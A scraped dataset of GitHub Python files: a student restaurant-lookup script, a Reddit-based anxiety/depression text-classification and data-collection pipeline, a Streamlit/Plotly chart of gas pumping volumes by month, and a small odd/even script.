[ { "alpha_fraction": 0.6255778074264526, "alphanum_fraction": 0.6312275528907776, "avg_line_length": 24.946666717529297, "blob_id": "6f8b83e35d5f0a092fe4372ce61de5c9e9bd7031", "content_id": "cfd8c495da2f50b17c0fe14b0358ed08c35e2d9a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1947, "license_type": "no_license", "max_line_length": 98, "num_lines": 75, "path": "/finsl", "repo_name": "Bryantmj/Final", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys\n\n\ndata = open(\"restaurants.csv\", \"r\")\nlines = data.readlines()\nrestaurant_name = []\nrestaurant_time = []\nrestaurant_food = []\nrestaurant_waittime = []\n\n\nfor line in lines:\n info = line.rstrip().split(\",\")\n restaurant_name.append(info[1])\n restaurant_time.append(info[2])\n restaurant_food.append(info[3])\n restaurant_waittime.append(info[4])\n\n\ndef close_restaurants():\n for i in range(1, len(restaurant_name)):\n if restaurant_waittime[i] == \"Three\" or \"Four\":\n print restaurant_name[i], \"is only \", restaurant_time[i], \" minutes away\"\n\n\ndef fast_restaurant():\n for i in range(1, len(restaurant_waittime)):\n if restaurant_waittime[i] == \"Low\":\n print restaurant_name[i], \"has a low estimated wait time\"\n\n\ndef choose_food():\n n = raw_input(\"Enter a food category: \")\n for i in range (1, len(restaurant_food)):\n if restaurant_food[i] == n:\n print \"These restaurants: \", restaurant_name[i], \"have \", restaurant_food[i]\n\ndef choose_restaurant():\n n = raw_input(\"Enter a restaurant name: \")\n for i in range (1, len(restaurant_name)):\n if restaurant_name[i] == n:\n print \"There is a \", restaurant_name[i], restaurant_time[i], \" minutes away from you \"\n\n\ndef most_common_food(restaurant_food):\n restaurant_food = []\n for row in range(0, restaurant_food):\n if restaurant_food[i] not in restaurant_food:\n food_list.append(restaurant_food[i])\n\n food_counts = []\n for food in food_list:\n total = 0\n for restaurant_food in restaurant_food:\n if restaurant_food == food:\n total += 1\n\n food_counts.append(total)\n\n return max(food_counts)\n\nprint \" \"\nprint \"My Final Project\"\nprint \" \"\nprint close_restaurants\nprint \" \"\nprint fast_restaurant\nprint \" \"\nprint choose_food\nprint \" \"\nprint choose_restaurant\nprint \" \"\nprint most_common_food\nprint \" \" \n" } ]
1
zsscode/DepressionResearch
https://github.com/zsscode/DepressionResearch
31e5a32436fec913a4e59409295d4ff4cd984e54
42aa695de51cad4a1b064f0ccbdf2b9ac1fb20ec
ac3205bd336ab67df694f8634ccce10dff280faf
refs/heads/master
2020-06-14T16:05:10.745169
2019-06-12T17:00:01
2019-06-12T17:00:01
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6971069574356079, "alphanum_fraction": 0.703490138053894, "avg_line_length": 46.84236526489258, "blob_id": "2615143cf942f711fbe2b515e2f9fceee28940c8", "content_id": "b7f6ed2dcd2257d9497ab34db365d4f661ed450b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9713, "license_type": "no_license", "max_line_length": 129, "num_lines": 203, "path": "/pipelineHelperFunctions.py", "repo_name": "zsscode/DepressionResearch", "src_encoding": "UTF-8", "text": "import re\nimport requests\nimport json\nimport os\nimport pandas as pd\nimport numpy as np\nimport warnings\nimport matplotlib.pyplot as plt\nwarnings.simplefilter(\"ignore\")\n\nfrom sklearn.decomposition import PCA\nfrom scipy.sparse import hstack\nfrom sklearn.svm import LinearSVC\nfrom nltk.corpus import stopwords\nfrom sklearn.utils import shuffle\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.preprocessing import LabelEncoder, normalize, Normalizer, MinMaxScaler\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.decomposition import NMF, LatentDirichletAllocation\nfrom sklearn.model_selection import train_test_split,cross_val_score\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer\n\n\ndef TitleClassifier(io_df):\n target = 'subreddit'\n cols = 'title'\n\n X = io_df[cols]\n y = io_df[target]\n\n count_vect = CountVectorizer(stop_words='english', lowercase=True, analyzer='word')\n X = count_vect.fit_transform(X)\n tfidf_transformer = TfidfTransformer()\n X = tfidf_transformer.fit_transform(X)\n\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\n svc = LinearSVC(random_state=42, penalty='l2', dual=True, tol=0.0001, C=1,\n fit_intercept=True, intercept_scaling=1.0, class_weight=None)\n svc.fit(X_train, y_train)\n y_pred = svc.predict(X_test)\n score = svc.score(X_test, y_test)\n\n print(\"First Classifier - Title (with SVM)\\n\")\n print(\"Accuracy Score:\", score)\n print(confusion_matrix(y_pred=y_pred, y_true=y_test))\n print(\"AUC Score:\", np.mean(cross_val_score(svc, X_train, y_train, cv=10, scoring='roc_auc')))\n\n feature_names = np.array(count_vect.get_feature_names())\n sorted_coef_index = svc.coef_[0].argsort()\n\n print('\\nSmallest Coefs: \\n{}\\n'.format(feature_names[sorted_coef_index[:10]]))\n print('Largest Coefs: \\n{}\\n'.format(feature_names[sorted_coef_index[:-11:-1]]))\n\n return svc, count_vect\n\ndef CleanData(dataset):\n dataset['post_text'] = dataset['post_text'].fillna('')\n dataset = dataset[dataset['post_text'] != '[removed]']\n dataset['post_text'] = dataset['post_text'].apply(lambda x: x.replace('\\r', ''))\n dataset['post_text'] = dataset['post_text'].apply(lambda x: x.replace('\\n', ''))\n dataset['post_text'] = dataset['post_text'].apply(lambda x: x.replace(\"\\'\", \"\"))\n dataset = dataset.dropna()\n dataset = dataset.reset_index()\n\n return dataset\n\ndef GetRegularExpressions(io_FullDF):\n # Find by using regular expressions all the sentences\n # which are built in the following way: \"i ...... anxi/ety/ous/olytic and so on\"\n keywordToFilterBy = input(\"Enter keyword to run regular expressions on\\n\")\n myRegEx = r'\\bi\\s.*\\b' + keywordToFilterBy + r'[\\w]*\\b'\n count = 0\n sentences = []\n post = []\n subreddits = []\n for row in io_FullDF.iterrows():\n\n sentence = row[1]['post_text']\n sentencesContainingRegEx = re.findall(myRegEx, sentence)\n if len(sentencesContainingRegEx) > 0:\n post.append(row[1]['submission_id'])\n subreddits.append(row[1]['subreddit'])\n sentences.append(sentence)\n count += 1\n print(\"Amount of posts containing the regular expression: \", count)\n return post\n\ndef GetDepressionGroupUsersNeutralPosts(i_RegularExpressionsPosts, io_FullDF):\n\n # Take n largest subreddit by appreance in the filtered dataset\n n_largest = list(i_RegularExpressionsPosts['subreddit'].value_counts().nlargest(7).keys())\n\n # Create the final depressed testing group to be compared with neutral people\n # by taking the depressed test group user id's, we can create the group's neutral posts\n depressed_group_depressed_posts = i_RegularExpressionsPosts[i_RegularExpressionsPosts['subreddit'].isin(n_largest)]\n depression_group_users = list(set(depressed_group_depressed_posts['user_name']))\n depression_group_users_indices = list(set(depressed_group_depressed_posts['user_name'].index))\n\n # Create a list of all the possible neutral predicted posts which contain our regular expression\n temp_list = list(\n depressed_group_depressed_posts[depressed_group_depressed_posts['predicted'] == 0]['submission_id'].index)\n\n # First, create the dataset comprised of the same users we have in our depression dataset\n # Second, take only the neutral related posts of these users\n # Third, drop out the posts which were filtered by the regular expression and are now considered depression wise\n # Fourth, Filter out empty posts and keep only the ones above 50 words, this leaves us with an almost similar in size dataset\n depression_group_users_neutral_posts = io_FullDF[io_FullDF['user_name'].isin(depression_group_users)]\n depression_group_users_neutral_posts = depression_group_users_neutral_posts[\n depression_group_users_neutral_posts['predicted'] == 0]\n depression_group_users_neutral_posts = depression_group_users_neutral_posts.drop(temp_list, axis=0)\n depression_group_users_neutral_posts = depression_group_users_neutral_posts[\n depression_group_users_neutral_posts['num_words_post'] > 50]\n\n # Create a dataset comprised of all the other users who weren't classified as depressed by our regular expression\n # next, we only want those who we classified by our original classifier, who were predicted as neutral => predicted = 0\n non_depressed_people = io_FullDF.drop(depression_group_users_indices, axis=0).copy()\n non_depressed_people = non_depressed_people[non_depressed_people['predicted'] == 1]\n non_depressed_people = non_depressed_people[non_depressed_people['num_words_post'] > 50]\n\n depression_group_users_neutral_posts = depression_group_users_neutral_posts.reset_index().drop('index', axis=1)\n neutral_total_subreddits = set(depression_group_users_neutral_posts['subreddit'].value_counts().keys())\n\n filtered_neutral_subreddits = list(set(n_largest) ^ neutral_total_subreddits)\n\n depression_group_users_neutral_posts = depression_group_users_neutral_posts[\n depression_group_users_neutral_posts['subreddit'].isin(filtered_neutral_subreddits)]\n\n # Print how many unique users we have for each group:\n print(\"Number of Unique depressed posts users:\", len(list(set(depressed_group_depressed_posts['user_name']))))\n print(\"Number of Unique depressed neutral posts users:\",\n len(list(set(depression_group_users_neutral_posts['user_name']))))\n print(\"Number of Unique neutral posts users\", len(list(set(non_depressed_people['user_name']))))\n\n return depression_group_users_neutral_posts\n\ndef ConvertInputToListOfStrings(io_Subreddits):\n io_Subreddits = io_Subreddits.replace(\"'\", \"\")\n io_Subreddits = io_Subreddits.split(',')\n return io_Subreddits\n\ndef GetNeutralAndDepressionSubreddits(io_Whole_data, i_Subreddits):\n neutralSubreddits = []\n depression_subreddits = []\n for i in i_Subreddits:\n values = io_Whole_data[io_Whole_data['subreddit'] == i]['predicted'].value_counts().values\n sum_values = np.sum(io_Whole_data[io_Whole_data['subreddit'] == i]['predicted'].value_counts().values)\n values_perc = values / sum_values\n # value1 = io_Whole_data[io_Whole_data['subreddit'] == i]['predicted'].value_counts().values[0]\n if io_Whole_data[io_Whole_data['subreddit'] == i]['predicted'].value_counts().keys()[0] == 1:\n if values_perc[0] >= 0.7:\n neutralSubreddits.append(i)\n else:\n if values_perc[0] >= 0.7:\n depression_subreddits.append(i)\n\n print(\"Distribution of depression subreddits\\n\")\n print(io_Whole_data[io_Whole_data['subreddit'].isin(depression_subreddits)]['subreddit'].value_counts())\n\n print(\"Distribution of neutral subreddits\\n\")\n print(io_Whole_data[io_Whole_data['subreddit'].isin(neutralSubreddits)]['subreddit'].value_counts())\n return neutralSubreddits, depression_subreddits\n\ndef GetNeutralDepressionUsers(io_WholeData, i_AnxietySubreddits, i_NeutralSubreddits):\n # Split the dataframe to neutral and depressed by the filtered subreddits\n depression_df = io_WholeData[io_WholeData['subreddit'].isin(i_AnxietySubreddits)]\n neutral_df = io_WholeData[io_WholeData['subreddit'].isin(i_NeutralSubreddits)]\n\n print(\"Anxiety group size:\\n\\n\", depression_df.shape)\n print(20 * \"-\")\n print(\"neutral group size:\\n\\n\", neutral_df.shape)\n\n # Get the list of all unique users for each type of dataset\n depression_names = list(set(depression_df['user_name']))\n neutral_names = list(set(neutral_df['user_name']))\n\n # Merge them back to a single dataframe\n full_df = pd.concat([depression_df, neutral_df], axis=0)\n full_df.shape\n\n # Filter out people who havn't posted in both types of subreddits (Depression/Neutral) in the current dataset\n both = []\n for i in depression_names:\n if i in neutral_names:\n both.append(i)\n print(\"Amount of unique users who are in both groups: \", len(both))\n\n anxietyGroupSize = 0\n neutralGroupSize = 0\n for user in depression_names:\n anxietyGroupSize += io_WholeData[io_WholeData['user_name'] == user].shape[0]\n\n for user in neutral_names:\n neutralGroupSize += io_WholeData[io_WholeData['user_name'] == user].shape[0]\n\n print(\"Posts taken from anxious users: \", anxietyGroupSize)\n print(20 * \"-\")\n print(\"Posts taken from neutral users: \", neutralGroupSize)\n\n full_df = full_df[full_df['user_name'].isin(both)]\n full_df = full_df.sort_values(by=['user_name', 'date_created'], ascending=False)\n full_df['num_distinct_words'] = full_df['post_text'].apply(lambda x: len(set(x.split())))\n\n return full_df\n\n" }, { "alpha_fraction": 0.716057300567627, "alphanum_fraction": 0.7204039692878723, "avg_line_length": 45.84431076049805, "blob_id": "c6a33c17a9951de2cac8febdff1cf9894699ca3d", "content_id": "636b28a3f0955d5c2b89d83a2ca3332e94c6148e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7822, "license_type": "no_license", "max_line_length": 129, "num_lines": 167, "path": "/preprocessingPipeline.py", "repo_name": "zsscode/DepressionResearch", "src_encoding": "UTF-8", "text": "import re\nimport pandas as pd\nimport numpy as np\nimport warnings\n\nwarnings.simplefilter(\"ignore\")\n\nfrom pipelineHelperFunctions import *\nfrom sklearn.svm import LinearSVC\nfrom sklearn.utils import shuffle\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.model_selection import train_test_split,cross_val_score\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer\n\ndef DataFilter(i_DF):\n i_DF = shuffle(i_DF)\n encoder = LabelEncoder()\n i_DF['subreddit'] = encoder.fit_transform(i_DF['subreddit'])\n i_DF['post_text'] = i_DF['post_text'].fillna('')\n i_DF = i_DF[i_DF['post_text'] != '[removed]']\n i_DF = i_DF[i_DF['title_length'] >= 20]\n i_DF = i_DF.dropna()\n return i_DF\n\ndef FilterWholeData(io_PartialData, io_WholeData):\n svc, count_vect = TitleClassifier(io_PartialData)\n io_WholeData = CleanData(io_WholeData)\n io_WholeData['predicted'] = svc.predict(count_vect.transform(io_WholeData['title']))\n # Filter out the data by noise\n # Subreddits with less than 50 appearences are dropped out\n counts = io_WholeData['subreddit'].value_counts()\n popular_subreddits = counts[counts.values >= 50].keys()\n io_WholeData = io_WholeData[(io_WholeData['subreddit'].isin(popular_subreddits))]\n\n return io_WholeData\n\n\n\ndef Pipeline():\n\n df = pd.read_csv(r'/home/ohad/Desktop/Studies/Year3/Project/Updated_Data/anxietyTemp.csv')\n df = DataFilter(df)\n\n whole_data = pd.read_csv(r'/home/ohad/Desktop/Studies/Year3/Project/Updated_Data/SubmissionsDF.csv', index_col=0)\n whole_data = FilterWholeData(df, whole_data)\n\n\n # Number of UNIQUE subreddits left after being filtered\n subreddits = set(whole_data['subreddit'])\n len(subreddits)\n\n neutral_subreddits, anxiety_subreddits = GetNeutralAndDepressionSubreddits(whole_data, subreddits)\n\n print(\"The Filtered Neutral Subreddits Are:\\n\\n\", neutral_subreddits)\n print(20 * \"-\")\n print(\"The Filtered Anxiety Subreddits are:\\n\\n\", anxiety_subreddits)\n\n anxiety_subreddit_filtered_list = ['Anxiety']\n\n # Split the dataframe to neutral and depressed by the filtered subreddits\n depression_df = whole_data[whole_data['subreddit'].isin(anxiety_subreddit_filtered_list)]\n neutral_df = whole_data[whole_data['subreddit'].isin(neutral_subreddits)]\n\n print(\"Anxiety group size:\\n\\n\", depression_df.shape)\n print(20 * \"-\")\n print(\"neutral group size:\\n\\n\", neutral_df.shape)\n\n # Get the list of all unique users for each type of dataset\n depression_names = list(set(depression_df['user_name']))\n neutral_names = list(set(neutral_df['user_name']))\n\n # Merge them back to a single dataframe\n full_df = pd.concat([depression_df, neutral_df], axis=0)\n full_df.shape\n\n # Filter out people who havn't posted in both types of subreddits (Depression/Neutral) in the current dataset\n both = []\n for i in depression_names:\n if i in neutral_names:\n both.append(i)\n print(\"Amount of unique users who are in both groups: \", len(both))\n\n anxietyGroupSize = 0\n neutralGroupSize = 0\n for user in depression_names:\n anxietyGroupSize += whole_data[whole_data['user_name'] == user].shape[0]\n\n for user in neutral_names:\n neutralGroupSize += whole_data[whole_data['user_name'] == user].shape[0]\n\n print(\"Posts taken from anxious users: \", anxietyGroupSize)\n print(20 * \"-\")\n print(\"Posts taken from neutral users: \", neutralGroupSize)\n\n full_df = full_df[full_df['user_name'].isin(both)]\n full_df = full_df.sort_values(by=['user_name', 'date_created'], ascending=False)\n full_df['num_distinct_words'] = full_df['post_text'].apply(lambda x: len(set(x.split())))\n\n post = GetRegularExpressions(full_df)\n\n # Find out how many unique users we found who match our regular expressions - by submission id\n # this is done to get only their depression related posts and not their entire posts\n # Later on, we'll take the rest of their post and categorize them as neutral based\n # this will be our compare group\n users_filtered_by_re = list(set(post))\n len(list(set(post)))\n\n # Get all the unique users found in the previous step\n filtered_by_re = full_df[full_df['submission_id'].isin(users_filtered_by_re)].copy()\n\n # Take n largest subreddit by appreance in the filtered dataset\n n_largest = list(filtered_by_re['subreddit'].value_counts().nlargest(7).keys())\n\n print(filtered_by_re['subreddit'].value_counts())\n\n # Create the final depressed testing group to be compared with neutral people\n # by taking the depressed test group user id's, we can create the group's neutral posts\n depressed_group_depressed_posts = filtered_by_re[filtered_by_re['subreddit'].isin(n_largest)]\n depression_group_users = list(set(depressed_group_depressed_posts['user_name']))\n depression_group_users_indices = list(set(depressed_group_depressed_posts['user_name'].index))\n\n # Create a list of all the possible neutral predicted posts which contain our regular expression\n temp_list = list(\n depressed_group_depressed_posts[depressed_group_depressed_posts['predicted'] == 1]['submission_id'].index)\n\n # First, create the dataset comprised of the same users we have in our depression dataset\n # Second, take only the neutral related posts of these users\n # Third, drop out the posts which were filtered by the regular expression and are now considered depression wise\n # Fourth, Filter out empty posts and keep only the ones above 50 words, this leaves us with an almost similar in size dataset\n depression_group_users_neutral_posts = full_df[full_df['user_name'].isin(depression_group_users)]\n depression_group_users_neutral_posts = depression_group_users_neutral_posts[\n depression_group_users_neutral_posts['predicted'] == 1]\n depression_group_users_neutral_posts = depression_group_users_neutral_posts.drop(temp_list, axis=0)\n depression_group_users_neutral_posts = depression_group_users_neutral_posts[\n depression_group_users_neutral_posts['num_words_post'] > 50]\n\n # Create a dataset comprised of all the other users who weren't classified as depressed by our regular expression\n # next, we only want those who we classified by our original classifier, who were predicted as neutral => predicted = 0\n non_depressed_people = full_df.drop(depression_group_users_indices, axis=0).copy()\n non_depressed_people = non_depressed_people[non_depressed_people['predicted'] == 1]\n non_depressed_people = non_depressed_people[non_depressed_people['num_words_post'] > 50]\n non_depressed_people.shape\n\n print(non_depressed_people.head())\n\n depression_group_users_neutral_posts = depression_group_users_neutral_posts.reset_index().drop('index', axis=1)\n neutral_total_subreddits = set(depression_group_users_neutral_posts['subreddit'].value_counts().keys())\n\n filtered_neutral_subreddits = list(set(n_largest) ^ neutral_total_subreddits)\n\n depression_group_users_neutral_posts = depression_group_users_neutral_posts[\n depression_group_users_neutral_posts['subreddit'].isin(filtered_neutral_subreddits)]\n depression_group_users_neutral_posts.shape\n\n # Print how many unique users we have for each group:\n print(\"Number of Unique depressed posts users:\", len(list(set(depressed_group_depressed_posts['user_name']))))\n print(\"Number of Unique depressed neutral posts users:\",\n len(list(set(depression_group_users_neutral_posts['user_name']))))\n print(\"Number of Unique neutral posts users\", len(list(set(non_depressed_people['user_name']))))\n\n print(\"Number of depression Neutral posts: \", depression_group_users_neutral_posts.shape)\n\n depression_group_users_neutral_posts.to_csv('neutralPosts.csv')\n\n\nPipeline()" }, { "alpha_fraction": 0.5639835000038147, "alphanum_fraction": 0.5699174404144287, "avg_line_length": 39.375, "blob_id": "74fc4dac8dc4e48a59baf5e827dd9a47e8211f50", "content_id": "9de92b12e3d04f44da35c1e6332c5ea01e8c018d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3876, "license_type": "no_license", "max_line_length": 128, "num_lines": 96, "path": "/Create_Data/createMoreData.py", "repo_name": "zsscode/DepressionResearch", "src_encoding": "UTF-8", "text": "import Create_Data.UtilFunctions as utils\nimport pandas as pd\n\n# Changed from a recursive function to an infinite loop.\n# thus, no extra memory required.\n#\nindex = 'reddit'\ndoc_type = 'submission'\nes = utils.Elasticsearch(\"http://localhost:9200\")\nif es.indices.exists(index=index):\n index_counter = es.count(index=index)\nelse:\n es.indices.create(index=index, ignore=400)\n index_counter = es.count(index=index)\n\nwhile True:\n\n reddit = utils.connectToAPI()\n new_subreddit = utils.getNewSubreddit(reddit, 20)\n submissionDF = utils.loadData()\n print(\"Current DataFrame Shape:{}\".format(submissionDF.shape))\n\n unique_names = utils.getNames(submissionDF, new_subreddit)\n print(\"Number of new users:{}\".format(len(unique_names)))\n\n if len(unique_names) == 0:\n print(\"Going to sleep\")\n # utils.sleep(60 * 20)\n print(\"Waking up\")\n pass # clear - works\n else:\n\n topics_dict = {\n \"submission_id\": [],\n \"title\": [],\n \"score\": [],\n \"num_comments\": [],\n \"title_length\": [],\n \"subreddit\": [],\n \"post_text\": [],\n \"comment_karma\": [],\n \"link_karma\": [],\n \"upvote_ratio\": [],\n \"date_created\": [],\n \"user_name\": [],\n \"appearance\": [],\n \"text_changed\": [],\n }\n\n\n print(\"Entering Part 1\\n\")\n for curr_id in unique_names:\n print(curr_id)\n try:\n for submission in reddit.redditor(str(curr_id)).submissions.new():\n userName = str(submission.author)\n topics_dict['submission_id'].append(submission.id)\n topics_dict['title'].append(submission.title)\n topics_dict['score'].append(submission.score)\n topics_dict['num_comments'].append(submission.num_comments)\n topics_dict['title_length'].append(len(submission.title))\n topics_dict['subreddit'].append(submission.subreddit)\n topics_dict['post_text'].append(submission.selftext)\n topics_dict['link_karma'].append(reddit.redditor(userName).link_karma)\n topics_dict['upvote_ratio'].append(submission.upvote_ratio)\n topics_dict['date_created'].append(submission.created_utc)\n topics_dict['user_name'].append(submission.author)\n topics_dict['comment_karma'].append(reddit.redditor(userName).comment_karma)\n topics_dict['appearance'].append(0)\n topics_dict['text_changed'].append(0)\n\n except Exception as e:\n print(\"Error occured with id:{}\".format(str(curr_id)))\n print(e)\n pass\n\n topics_dict = utils.pd.DataFrame(data=topics_dict)\n\n print(\"Entering Part 2\")\n topics_dict = topics_dict[['submission_id', 'title', 'score', 'num_comments',\n 'title_length', 'subreddit', 'post_text', 'comment_karma',\n 'link_karma', 'upvote_ratio', 'date_created', 'user_name', 'appearance', 'text_changed']]\n topics_dict = utils.createMoreFeatures(topics_dict)\n\n print(\"Loading to Elasticsearch\")\n topics_dict.to_csv('temp_json.csv',index=False)\n topics_dict = pd.read_csv('temp_json.csv')\n topics_dict.to_json('temp_json.json', orient='index')\n\n utils.init_elastic(index=index, doc_type=doc_type, elastic_address=\"http://localhost:9200\", index_counter=index_counter)\n index_counter = es.count(index=index)\n print(\"Saving\")\n topics_dict = utils.pd.concat([topics_dict, submissionDF], sort=False)\n topics_dict = topics_dict.fillna('')\n\n topics_dict.to_csv('SubmissionsDF2.csv', index=False)\n" }, { "alpha_fraction": 0.7154929637908936, "alphanum_fraction": 0.7253521084785461, "avg_line_length": 27.31999969482422, "blob_id": "c12b36f774137c4881c6445a8f3921f7cff98104", "content_id": "32d6a0b3661c26d899d3f54e062e28860a01aa67", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 710, "license_type": "no_license", "max_line_length": 102, "num_lines": 25, "path": "/Create_Data/bulk_load_elastic.py", "repo_name": "zsscode/DepressionResearch", "src_encoding": "UTF-8", "text": "import json\nimport pandas as pd\nfrom elasticsearch import Elasticsearch\n\n\ndata = pd.read_csv(r'C:\\Users\\Gilad\\PycharmProjects\\DepressionResearch\\Create_Data\\SubmissionsDF.csv')\ndata.to_json('bulk_load.json', orient='index')\n\njson_data = open('bulk_load.json').read()\ndata = json.loads(json_data)\n\nes = Elasticsearch(\"http://localhost:9200\")\nindex = 'reddit'\ndoc_type = 'submission'\n\nif es.indices.exists(index=index):\n index_counter = es.count(index=index)\nelse:\n es.indices.create(index=index, ignore=400)\n index_counter = es.count(index=index)\n\ncount = index_counter['count']\n\nfor ind in range(count, len(data)):\n es.index(index=index, doc_type=doc_type, id=ind, body=list(data.values())[ind])\n\n\n" } ]
4
AnastasyaEremenko1906/Plotly_Nastya
https://github.com/AnastasyaEremenko1906/Plotly_Nastya
bd60c3f15823e7334c75bf766b9cbb91797b4924
87611c2b5eb8cfd54479efbb914b45b789abf6b7
546df42e818f763cdde1ad13841c06d756a05d8b
refs/heads/main
2023-08-15T16:20:02.487429
2021-10-14T12:46:05
2021-10-14T12:46:05
416,764,420
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.685479998588562, "alphanum_fraction": 0.6997105479240417, "avg_line_length": 47.20930099487305, "blob_id": "5a7c2f5f1367e1a8db293b3caf742ebb201479ae", "content_id": "8ed75b20f55b5429356cdf4c7e9198ae3eb63ab2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4771, "license_type": "no_license", "max_line_length": 143, "num_lines": 86, "path": "/for_fix.py", "repo_name": "AnastasyaEremenko1906/Plotly_Nastya", "src_encoding": "UTF-8", "text": "import psycopg2\nimport streamlit as st\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport plotly.graph_objects as go\nfrom PIL import Image\nimport datetime\nfrom dateutil import relativedelta\nfrom datetime import date\n\n\n# 1. Считываю исходный df\n\ndf = pd.read_excel(\"https://github.com/AnastasyaEremenko1906/Plotly_Nastya/blob/6aa8fa2c071cd9900b4347df1ff6c56cd428d553/output.xlsx?raw=True\")\ndf['volume'] = df['volume'].astype('int')\n# 2. Перевожу даты в дататайп, считаю длит-ть перекачки + смотрю, была ли перекачка в одном и том же месяце\n\nadding_columns = df.copy()\nadding_columns[\"start_pump\"] = pd.to_datetime(adding_columns[\"start_pump\"])\nadding_columns[\"end_pump\"] = pd.to_datetime(adding_columns[\"end_pump\"])\nadding_columns['pump_days'] = adding_columns.apply(\n lambda row: relativedelta.relativedelta(row['end_pump'], row['start_pump']).days, axis=1)\nadding_columns['pump_days'] = adding_columns['pump_days'] + 1\nadding_columns['delta_month'] = adding_columns['end_pump'].dt.month - adding_columns['start_pump'].dt.month\n# 3. Создаю 2 датафрейма:где перекачка велась в одном и том же месяце (df_month_true) и в разных\n\ndf_month_false = adding_columns[adding_columns['delta_month'] == 1]\ndf_month_true = adding_columns[adding_columns['delta_month'] == 0]\n# 3.1 Создаю две копии, работаю с НЕСОВПАДАЮЩИМИ месяцами (delta_month = 1)\n\ntable_same = df_month_true.copy()\ntable_not_same = df_month_false.copy()\n# 3.2 Добавляю 2 столбца: сколько дней качали в первом месяце (starting_day) и сколько во втором (ending_day)\n\ntable_not_same['ending_day'] = table_not_same['end_pump'].dt.day\ntable_not_same['starting_day'] = table_not_same['pump_days'] - table_not_same['ending_day']\n# 3.3 Добавляю 2 столбца: сколько газа качали в первом месяце (starting_day) и сколько во втором (ending_day)\ntable_not_same['volume_end'] = table_not_same['volume'] * table_not_same['ending_day'] / table_not_same['pump_days']\ntable_not_same['volume_start'] = table_not_same['volume'] * table_not_same['starting_day'] / table_not_same['pump_days']\ntable_not_same = table_not_same.astype({'volume_end': 'int', 'volume_start': 'int'})\n# 3.4 Создаю df, где провожу группировку по месяцам\n\ndf_not_same = table_not_same.copy()\ndf_not_same['start_pump'] = df_not_same['start_pump'].dt.month\ndf_not_same['end_pump'] = df_not_same['end_pump'].dt.month\n\ndf_not_same_start = df_not_same.groupby('start_pump', as_index=False) \\\n .agg({'volume_start': 'sum'}) \\\n .rename(columns={\"start_pump\": \"month_number\", \"volume_start\": \"volume\"})\ndf_not_same_finish = df_not_same.groupby('end_pump', as_index=False) \\\n .agg({'volume_end': 'sum'}) \\\n .rename(columns={\"end_pump\": \"month_number\", \"volume_end\": \"volume\"})\n# 3.5 Создаю итоговый df для перекачек, идущих в нескольких месяцах\n\ndf_not_same_union = pd.merge(df_not_same_finish, df_not_same_start, how=\"outer\") \\\n .groupby(\"month_number\", as_index=False) \\\n .agg({\"volume\": \"sum\"})\n# 4 Работаю с СОВПАДАЮЩИМИ месяцами\n\ndf_same_union = table_same.copy()\ndf_same_union['start_pump'] = df_same_union['start_pump'].dt.month\ndf_same_union = df_same_union.groupby(\"start_pump\", as_index=False) \\\n .agg({\"volume\": \"sum\"}) \\\n .rename(columns={\"start_pump\": \"month_number\"})\n# 5.1 Свожу всё в один df. На выходе объем перекачек по месяцам\n\ndf_total = pd.merge(df_not_same_union, df_same_union, how=\"outer\") \\\n .groupby(\"month_number\", as_index=False) \\\n .agg({\"volume\": \"sum\"}) \\\n .sort_values([\"month_number\"]) \\\n .astype({'month_number': 'str'})\n# 5.2 Делаю свою сортировку, сортирую по месяцам\n\nmonth_id = [str(i) for i in range(1, 13)]\nsorter = ['Январь', 'Февраль', 'Март', 'Апрель', 'Май', 'Июнь', 'Июль', 'Август', 'Сентябрь', 'Октябрь', 'Ноябрь',\n 'Декабрь']\nindex_to_month = {index: month for index, month in zip(month_id, sorter)}\nmonth_literals = [index_to_month[i] for i in index_to_month]\ndf_total['month_number'] = df_total['month_number'].replace(index_to_month)\n# 6 Строю графики\nfig = go.Figure(\n data=[go.Bar(x=df_total['month_number'], y=df_total['volume'])],\n layout_title_text=\"Распределение объёма по месяцам\"\n)\nst.plotly_chart(fig)\n" } ]
1
surbbahl/sdet
https://github.com/surbbahl/sdet
98ae582fa0824dba579a2d172b629a4acb8f71e2
fc4967cef22e3924b282a7b285382bc53eb64002
bc1b4c32faecd2d12a01a398a37a32eab81a5cdd
refs/heads/main
2023-06-18T04:00:01.716720
2021-07-16T15:26:07
2021-07-16T15:26:07
317,445,538
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5491803288459778, "alphanum_fraction": 0.5573770403862, "avg_line_length": 27.75, "blob_id": "521845c7eb949369960f93b5a68fca35b9a5cef3", "content_id": "854eccf82c239ebdee2cb7c573e43dfd46e47dd7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 244, "license_type": "no_license", "max_line_length": 39, "num_lines": 8, "path": "/odd_even.py", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "K=input(\"DO you wnat to enter numnerY\")\r\nwhile (K!='N'):\r\n Number=input(\"Enter the number\")\r\n if int(Number)%2==0:\r\n print(\"Number is even\")\r\n else:\r\n print(\"Number is odd\")\r\n K=input(\"Do you want to comtinue\")\r\n \r\n" }, { "alpha_fraction": 0.6988833546638489, "alphanum_fraction": 0.7104350924491882, "avg_line_length": 46.092594146728516, "blob_id": "a21faca55a18ece538bdde4b7e65be06012aea97", "content_id": "9f2df1b09930c13882cab06fc3b4e3d8975472a2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2597, "license_type": "no_license", "max_line_length": 169, "num_lines": 54, "path": 